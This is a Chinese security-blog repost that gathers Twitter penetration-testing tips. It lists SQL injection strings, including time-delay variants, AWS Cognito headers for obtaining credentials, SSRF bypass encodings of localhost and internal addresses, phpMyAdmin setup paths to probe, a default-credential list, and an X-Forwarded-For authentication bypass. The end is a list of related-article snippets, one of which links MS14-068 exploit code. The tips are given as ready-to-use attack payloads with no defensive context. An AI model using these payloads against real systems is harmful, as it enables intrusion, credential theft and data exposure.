干货 | Twitter渗透技巧搬运工

VSole2022-08-16 06:46:31

快速检测有无SQL注入

' OR 1=1--
' OR 1=0--
%27%20or%201=1
*(|(object=*))
)%20or%20('x'='x
%20or%201=1
1) or pg_sleep(__TIME__)--
/**/or/**/1/**/=1
' or username like '%
);waitfor delay '0:0:__TIME__'--
or isNULL(1/0) /*
x' or 1=1 or 'x'='y

来源:https://twitter.com/_bughunter/status/1521830121270910977?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

AWS Cognito 配置错误

X-AMZ-Target:AWSCognitoIdentityProviderService.ConfirmSignUp
X-AMZ-Target:AWSCognitoIdentityProviderService.GetUser
获取凭证访问密钥 ID 和密钥 将标头更改为这样并观察响应
X-AMZ-TARGET:AWSCognitoIdentityService.GetCredentialsForIdentity

来源:

https://threadreaderapp.com/thread/1522086964262051841.html

SSRF Bypass技巧

SSRF Bypasses
http://0.0.0.0
http://0
http://0x7f000001
http://2130706433
http://0000::1
http://0000::1:25
http://0000::1:22
http://0000::1:3128
http://2130706433
http://3232235521
http://3232235777
http://2852039166
http://0o177.0.0.1

来源:https://twitter.com/_bughunter/status/1521833353015709698?s=20&t=VSyAza5nbjxnUqIw5N9Wyw

PHPMyadmin渗透技巧

当默认凭据在#phpmyadmin登录时不起作用时,我会尝试访问这些路径
admin/phpMyAdmin/setup/index.php
phpMyAdmin/main.php
phpmyadmin/pma/
Admin/setup/index.php
phpmyadmin/admin/setup/index.php
phpmyadmin/setup/
phpmyadmin/setup/index.php

来源:https://twitter.com/tamimhasan404/status/1522814723271512065?s=20&t=lpTy2cTCgvIjmJ9JyE7-8Q

找到管理员登录口,可以尝试以下账号密码

admin:admin
admin:a
admin:12346578
test:test
guest:guest
anonymous:anonymous
admin:password
admin:
root:toor
root:passw0rd
root:root
guest:test
$sub_name:password
ADMIN:ADMIN
Admin:Admin
:
a:a

来源:https://twitter.com/_bughunter/status/1521374403761745920?s=20&t=aInLegLknUcam2qSjbt2PA

漏洞挖掘小技巧-身份绕过小技巧,修改XFF头

Authentication bypass.... 
Using custom header (See attached screenshot):
X-Forwarded-For: 127.0.0.1

httpsadmin
本作品采用《CC 协议》,转载必须注明作者和本文链接
dnslog.link,命令执行漏洞的时候搞起ls命令记录起来很利索,比dnslog.cn快
近日,谷歌正在测试一项新功能,以防止恶意公共网站通过用户浏览器攻击内部专用网络上的设备和服务。新版本将能够检测并阻止恶意分子通过网络钓鱼等手段试图控制用户局域网内其他设备的行为。
域渗透历史漏洞汇总
2022-04-14 06:58:32
MS14-068(CVE-2014-6324) Kerberos 校验和漏洞 https://nvd.nist.gov/vuln/detail/CVE-2014-6324 EXP/POC: https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
虚机ubuntu20.04, 安装docker, sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker, newgrp docker, 安装docker-compose, sudo apt install docker-compose, 给harbor起个本地域
域渗透重要漏洞汇总
uDork并不会对任何服务器执行攻击行为,它只会使用预定义的Dork或exploit-db.com提供的官方列表来进行搜索和查询。Google Hacking是使用搜索引擎,比如谷歌来定位因特网上的安全隐患和易攻击点。谷歌对于第一种攻击者来说用处很少,但是对于第二种攻击者则发挥了重要作用。扫描器是自动开始一个检查系统的绝大部分地方的过程,以便发现安全缺陷的这样一个程序。
harbor2.5版本开始支持cosign做镜像签名,本周实践了一下, ubuntu20.04.4,安装docker,sudo apt install docker.io, sudo systemctl enable docker, sudo gpasswd -a ubuntu docker, newgrp docker, 安装docker-compose,sudo apt instal
这篇文章主要收集一些常见的未授权访问漏洞。未授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。
VSole
网络安全专家